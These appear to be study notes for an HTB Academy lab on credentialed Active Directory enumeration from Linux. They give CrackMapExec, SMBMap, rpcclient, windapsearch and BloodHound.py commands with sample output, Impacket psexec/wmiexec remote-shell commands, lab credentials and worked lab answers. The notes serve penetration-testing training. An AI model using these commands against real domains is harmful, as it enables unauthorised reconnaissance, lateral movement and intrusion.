π§Credentialed Enumeration from Linux
π Overview
After gaining initial access and valid domain credentials, the next phase involves deep enumeration of the Active Directory environment. This comprehensive enumeration focuses on gathering detailed information about domain users, computers, groups, Group Policy Objects, permissions, ACLs, trusts, and attack paths using various Linux-based tools.
π― Prerequisites
π Required Credentials
Valid domain user credentials (any permission level)
Cleartext password, NTLM hash, or SYSTEM access on domain-joined host
Minimum privilege: Standard domain user account
π οΈ Key Tools Covered
CrackMapExec (CME): Multi-protocol enumeration and exploitation
SMBMap: SMB share enumeration and interaction
rpcclient: RPC-based enumeration and manipulation
Impacket: Python toolkit for Windows protocol interaction
Windapsearch: LDAP-based domain enumeration
BloodHound.py: AD attack path visualization data collection
π¨ CrackMapExec (CME)
π Overview
CrackMapExec (now NetExec) is a powerful multi-protocol toolkit that leverages Impacket and PowerSploit packages for comprehensive AD assessment. It supports MSSQL, SMB, SSH, and WinRM protocols.
π Basic Syntax and Options
# Basic CME help
crackmapexec -h
# SMB protocol options
crackmapexec smb -h
# Key flags for domain enumeration:
-u USERNAME # User credentials to authenticate
-p PASSWORD # User's password
--users # Enumerate domain users
--groups # Enumerate domain groups
--loggedon-users # Enumerate logged-on users
--shares # Enumerate available shares
--pass-pol # Enumerate password policyπ₯ Domain User Enumeration
# Enumerate all domain users with detailed information
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --usersExample Output Analysis:
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] Enumerated domain user(s)
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\administrator badpwdcount: 0 baddpwdtime: 2022-03-29 12:29:14.476567
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\guest badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\lab_adm badpwdcount: 0 baddpwdtime: 2022-04-09 23:04:58.611828
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\krbtgt badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\htb-student badpwdcount: 0 baddpwdtime: 2022-03-30 16:27:41.960920
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\avazquez badpwdcount: 3 baddpwdtime: 2022-02-24 18:10:01.903395π― Key Information:
badpwdcount: Failed password attempts (useful for password spraying target lists)
baddpwdtime: Last failed authentication timestamp
Account status: Active vs disabled accounts
π·οΈ Domain Group Enumeration
# Enumerate all domain groups and membership counts
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groupsExample Output:
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] Enumerated domain group(s)
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Administrators membercount: 3
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Users membercount: 4
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Guests membercount: 2
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Backup Operators membercount: 1
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Domain Admins membercount: 19
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Domain Users membercount: 0
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Contractors membercount: 138
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Accounting membercount: 15
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Engineering membercount: 19
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Executives membercount: 10
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Human Resources membercount: 36π Groups of Interest:
Domain Admins: Highest privilege group
Backup Operators: Backup and restore privileges
Executives: High-value targets
Engineering/IT groups: Technical privileges
π¨βπ» Logged-On Users Enumeration
# Check what users are currently logged into target hosts
sudo crackmapexec smb 172.16.5.130 -u forend -p Klmcargo2 --loggedon-usersExample Output:
SMB 172.16.5.130 445 ACADEMY-EA-FILE [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-FILE) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False)
SMB 172.16.5.130 445 ACADEMY-EA-FILE [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2 (Pwn3d!)
SMB 172.16.5.130 445 ACADEMY-EA-FILE [+] Enumerated loggedon users
SMB 172.16.5.130 445 ACADEMY-EA-FILE INLANEFREIGHT\clusteragent logon_server: ACADEMY-EA-DC01
SMB 172.16.5.130 445 ACADEMY-EA-FILE INLANEFREIGHT\lab_adm logon_server: ACADEMY-EA-DC01
SMB 172.16.5.130 445 ACADEMY-EA-FILE INLANEFREIGHT\svc_qualys logon_server: ACADEMY-EA-DC01
SMB 172.16.5.130 445 ACADEMY-EA-FILE INLANEFREIGHT\wley logon_server: ACADEMY-EA-DC01π Key Observations:
(Pwn3d!): forend is local admin on this host
Multiple admin users: lab_adm, svc_qualys logged in
High-value targets: Domain admin users active on file server
π Share Enumeration
# Enumerate available shares and permissions
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --sharesExample Output:
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] Enumerated shares
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Share Permissions Remark
SMB 172.16.5.5 445 ACADEMY-EA-DC01 ----- ----------- ------
SMB 172.16.5.5 445 ACADEMY-EA-DC01 ADMIN$ Remote Admin
SMB 172.16.5.5 445 ACADEMY-EA-DC01 C$ Default share
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Department Shares READ
SMB 172.16.5.5 445 ACADEMY-EA-DC01 IPC$ READ Remote IPC
SMB 172.16.5.5 445 ACADEMY-EA-DC01 NETLOGON READ Logon server share
SMB 172.16.5.5 445 ACADEMY-EA-DC01 SYSVOL READ Logon server share
SMB 172.16.5.5 445 ACADEMY-EA-DC01 User Shares READ
SMB 172.16.5.5 445 ACADEMY-EA-DC01 ZZZ_archive READ π·οΈ Share Content Spidering
# Use spider_plus module to crawl share contents
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M spider_plus --share 'Department Shares'
# Check results
head -n 10 /tmp/cme_spider_plus/172.16.5.5.json Example JSON Output:
{
"Department Shares": {
"Accounting/Private/AddSelect.bat": {
"atime_epoch": "2022-03-31 14:44:42",
"ctime_epoch": "2022-03-31 14:44:39",
"mtime_epoch": "2022-03-31 15:14:46",
"size": "278 Bytes"
}
}
}ποΈ SMBMap
π Overview
SMBMap specializes in SMB share enumeration, providing detailed share listings, permissions, and content exploration capabilities.
π Basic Share Access Check
# Check share access and permissions
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5π Recursive Directory Listing
# Recursive listing of directories in specific share
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R 'Department Shares' --dir-onlyπ rpcclient
π Overview
rpcclient leverages MS-RPC functionality to enumerate, modify, and interact with AD objects. It supports both authenticated and unauthenticated (NULL session) enumeration.
π Establishing Connection
# Authenticated connection
rpcclient -U "INLANEFREIGHT.LOCAL\forend%Klmcargo2" 172.16.5.5
# NULL session (if allowed)
rpcclient -U "" -N 172.16.5.5π₯ User Enumeration
# List all domain users with RIDs
rpcclient $> enumdomusers
# Example output:
user:[administrator] rid:[0x1f4]
user:[guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[lab_adm] rid:[0x3e9]
user:[htb-student] rid:[0x457]π User Information by RID
# Query specific user by RID (hex)
rpcclient $> queryuser 0x457π RID and SID Understanding
# RID (Relative Identifier) Examples:
# Administrator: RID 0x1f4 (500 decimal) - Always the same
# Domain Users: RID 0x201 (513 decimal) - Standard group
# Domain Admins: RID 0x200 (512 decimal) - Admin group
# Full SID format: S-1-5-21-<domain-identifier>-<RID>
# Example: S-1-5-21-3842939050-3880317879-2865463114-1111π Impacket Toolkit
π Overview
Impacket provides Python-based tools for interacting with Windows protocols. Two key tools are psexec.py and wmiexec.py.
β‘ psexec.py
# Establish SYSTEM-level shell via service creation
psexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.125π― wmiexec.py
# Semi-interactive shell via WMI
wmiexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.5π Windapsearch
π Overview
Windapsearch is a Python script for LDAP-based enumeration of users, groups, and computers.
π Domain Admins Enumeration
# Enumerate Domain Admins group members
python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 --daπ― Privileged Users (Nested Groups)
# Find all privileged users via recursive group membership
python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 -PUπ©Έ BloodHound.py
π Overview
BloodHound.py is the Python ingestor for BloodHound, collecting AD data for attack path visualization.
π Data Collection
# Collect all available data
sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c allπ Output Files
# Generated JSON files
20220307163102_computers.json
20220307163102_domains.json
20220307163102_groups.json
20220307163102_users.json
# Create zip for BloodHound GUI upload
zip -r ilfreight_bh.zip *.jsonπ― HTB Academy Lab Solutions
π Lab Questions & Solutions
π Question 1: "What AD User has a RID equal to Decimal 1170?"
Solution Process:
# Step 1: Convert decimal 1170 to hex
python3 -c "print(hex(1170))"
# Output: 0x492
# Step 2: Use rpcclient to query the RID
rpcclient -U "INLANEFREIGHT.LOCAL\forend%Klmcargo2" 172.16.5.5
rpcclient $> queryuser 0x492
# Step 3: Identify the username from output
# Alternative: enumerate all users and filter
rpcclient $> enumdomusers | grep 0x492π₯ Question 2: "What is the membercount: of the 'Interns' group?"
Solution Process:
# Method 1: Using CrackMapExec
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups | grep -i interns
# Method 2: Using rpcclient
rpcclient -U "INLANEFREIGHT.LOCAL\forend%Klmcargo2" 172.16.5.5
rpcclient $> enumdomgroups | grep -i interns
# Note the RID, then:
rpcclient $> querygroup [RID_OF_INTERNS_GROUP]β‘ Quick Reference Commands
π§ Essential One-Liners
# Quick domain user count
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --users | grep -c "INLANEFREIGHT.LOCAL"
# Find Domain Admin count
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups | grep "Domain Admins" | awk '{print $NF}'
# RID to hex conversion
python3 -c "print(hex(1170))" # Converts decimal to hex for rpcclientπ Key Takeaways
β
Critical Success Factors
Valid credentials are essential - Even low-privilege domain user accounts unlock extensive enumeration
Multiple tools provide different perspectives - Use complementary tools for comprehensive coverage
Save all output to files - Essential for analysis, correlation, and reporting
Focus on privileged groups - Domain Admins, Enterprise Admins, Backup Operators, etc.
π― Strategic Priorities
User enumeration - Identify high-value targets and service accounts
Group membership analysis - Understand privilege relationships
Share exploration - Find sensitive data and configuration files
Session hunting - Locate privileged users on accessible systems
Attack path visualization - Use BloodHound for strategic planning
Credentialed enumeration from Linux provides powerful capabilities for AD assessment - with valid credentials, even low-privilege accounts can reveal extensive domain intelligence for strategic attack planning.
Last updated